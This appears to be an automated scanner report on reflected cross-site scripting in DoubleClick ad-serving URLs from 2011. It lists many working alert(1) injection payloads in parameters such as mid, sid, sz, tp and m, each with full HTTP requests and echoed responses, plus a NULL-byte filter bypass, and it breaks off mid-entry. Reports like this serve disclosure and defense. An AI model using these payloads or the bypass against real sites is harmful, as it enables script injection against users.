The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b27c"-alert(1)-"b0efc15adcb was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=5215548b27c"-alert(1)-"b0efc15adcb&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:13 GMT Expires: Sat, 29 Jan 2011 05:20:13 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=5215548b27c"-alert(1)-"b0efc15adcb&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4f97'-alert(1)-'3c450e58e7b was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554c4f97'-alert(1)-'3c450e58e7b&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:13 GMT Expires: Sat, 29 Jan 2011 05:20:13 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554c4f97'-alert(1)-'3c450e58e7b&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\"> ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72347'-alert(1)-'4c8f0ab3a92 was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439372347'-alert(1)-'4c8f0ab3a92&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:17 GMT Expires: Sat, 29 Jan 2011 05:20:17 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439372347'-alert(1)-'4c8f0ab3a92&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\"> ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b99"-alert(1)-"22b3257a069 was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439373b99"-alert(1)-"22b3257a069&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:16 GMT Expires: Sat, 29 Jan 2011 05:20:16 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439373b99"-alert(1)-"22b3257a069&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3db2"-alert(1)-"c4dc2695016 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602e3db2"-alert(1)-"c4dc2695016&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:11 GMT Expires: Sat, 29 Jan 2011 05:20:11 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602e3db2"-alert(1)-"c4dc2695016&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f28b5'-alert(1)-'fba16b567ae was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602f28b5'-alert(1)-'fba16b567ae&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:13 GMT Expires: Sat, 29 Jan 2011 05:20:13 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... k%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602f28b5'-alert(1)-'fba16b567ae&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\"> ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f182e'-alert(1)-'844d4f6d01f was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8f182e'-alert(1)-'844d4f6d01f&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:21 GMT Expires: Sat, 29 Jan 2011 05:20:21 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 7005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8f182e'-alert(1)-'844d4f6d01f&forced_click=http%3a%2f%2fwww.dawnrecetas.com\"> ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65f12"-alert(1)-"83d92f4e7a4 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=865f12"-alert(1)-"83d92f4e7a4&forced_click=;ord=20110128225610?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5815 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:21 GMT Expires: Sat, 29 Jan 2011 05:20:21 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Oct 26 10:32:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 7005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=865f12"-alert(1)-"83d92f4e7a4&forced_click=http%3a%2f%2fwww.dawnrecetas.com"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %004bbf5"-alert(1)-"260e69958b was submitted in the c parameter. This input was echoed as 4bbf5"-alert(1)-"260e69958b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0%004bbf5"-alert(1)-"260e69958b&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6231 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:22 GMT Expires: Sat, 29 Jan 2011 05:20:22 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0%004bbf5"-alert(1)-"260e69958b&tp=8&forced_click=http://instoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptac ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 364be'-alert(1)-'2ba227b9740 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0364be'-alert(1)-'2ba227b9740&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 496 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:23 GMT Expires: Sat, 29 Jan 2011 05:20:23 GMT Connection: close
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef88f'-alert(1)-'362fa6d4daf was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=ef88f'-alert(1)-'362fa6d4daf HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6223 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:26 GMT Expires: Sat, 29 Jan 2011 05:20:26 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... %3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=ef88f'-alert(1)-'362fa6d4dafhttp://instoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\"> ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a0b1"-alert(1)-"82733519075 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6a0b1"-alert(1)-"82733519075&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6237 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:17 GMT Expires: Sat, 29 Jan 2011 05:20:17 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... e/f/7d/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6a0b1"-alert(1)-"82733519075&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb052'-alert(1)-'fcd59c06eba was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6fb052'-alert(1)-'fcd59c06eba&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6241 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:18 GMT Expires: Sat, 29 Jan 2011 05:20:18 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... /f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6fb052'-alert(1)-'fcd59c06eba&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\"> ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa157"-alert(1)-"44321d95d77 was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438aa157"-alert(1)-"44321d95d77&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6241 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:15 GMT Expires: Sat, 29 Jan 2011 05:20:15 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3a9e/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438aa157"-alert(1)-"44321d95d77&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cb80'-alert(1)-'81af67c145b was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=5194384cb80'-alert(1)-'81af67c145b&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6241 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:15 GMT Expires: Sat, 29 Jan 2011 05:20:15 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3a9e/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=5194384cb80'-alert(1)-'81af67c145b&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\"> ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9db7'-alert(1)-'c5b33736d34 was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393d9db7'-alert(1)-'c5b33736d34&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 496 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:21 GMT Expires: Sat, 29 Jan 2011 05:20:21 GMT Connection: close
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 158a9'-alert(1)-'deb9cc6efed was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313158a9'-alert(1)-'deb9cc6efed&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
